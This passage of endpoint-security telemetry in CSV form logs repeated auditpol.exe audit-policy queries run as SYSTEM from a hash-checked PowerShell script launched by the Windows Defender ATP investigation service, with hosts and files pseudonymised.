01:27:35.636695900+00:00,cc63d6a9-07e3-4727-93cd-1e98292c66b7,computerpii_0a470890c60768167990033d701e7bd881398861,172086,False,10.7740.19041.1052,False,11540474045175659,,11540474045175708,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+610,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.510768700+00:00,15296,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce921c-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.727678800+00:00,2021-06-24 01:27:35.636790800+00:00,808a5fde-cad3-44ee-830f-59ec5b8d1cc1,computerpii_0a470890c60768167990033d701e7bd881398861,172087,False,10.7740.19041.1052,False,11540474045175659,,11540474045175709,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+611,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.728074900+00:00,12320,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce921b-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.754640900+00:00,2021-06-24 01:27:35.636886800+00:00,7a1244ac-f405-488e-ac8a-eb6c6709c58c,computerpii_0a470890c60768167990033d701e7bd881398861,172088,False,10.7740.19041.1052,False,11540474045175659,,11540474045175710,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+612,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.742347900+00:00,11800,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9244-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.755437300+00:00,2021-06-24 01:27:35.636985100+00:00,1f25eccb-ae96-4edf-8e51-6557680cc20b,computerpii_0a470890c60768167990033d701e7bd881398861,172089,False,10.7740.19041.1052,False,11540474045175659,,11540474045175711,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+613,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.755889700+00:00,18452,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9224-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.771093500+00:00,2021-06-24 01:27:35.637081+00:00,d85f268a-a227-4876-9947-24d42e97f9c7,computerpii_0a470890c60768167990033d701e7bd881398861,172090,False,10.7740.19041.1052,False,11540474045175659,,11540474045175712,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+614,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.771533400+00:00,10676,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9227-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.799428400+00:00,2021-06-24 01:27:35.637176700+00:00,64bdc38a-fc2a-46e1-b528-826e1cad86d0,computerpii_0a470890c60768167990033d701e7bd881398861,172091,False,10.7740.19041.1052,False,11540474045175659,,11540474045175713,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+615,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.786783800+00:00,18056,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9245-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.800159400+00:00,2021-06-24 01:27:35.637273500+00:00,6b6d26d6-c72e-4576-9ca1-99ddb7910b31,computerpii_0a470890c60768167990033d701e7bd881398861,172092,False,10.7740.19041.1052,False,11540474045175659,,11540474045175714,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+616,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.800406+00:00,9632,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce922f-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.818894600+00:00,2021-06-24 01:27:35.637371500+00:00,170975d8-ac45-49e2-8e20-3011b5922838,computerpii_0a470890c60768167990033d701e7bd881398861,172093,False,10.7740.19041.1052,False,11540474045175659,,11540474045175715,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+617,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.814035500+00:00,5660,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9230-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.819631300+00:00,2021-06-24 01:27:35.637465400+00:00,95edc6ba-41bc-426c-8870-23a86f77cb3f,computerpii_0a470890c60768167990033d701e7bd881398861,172094,False,10.7740.19041.1052,False,11540474045175659,,11540474045175716,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+618,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.828322600+00:00,7192,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9231-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, 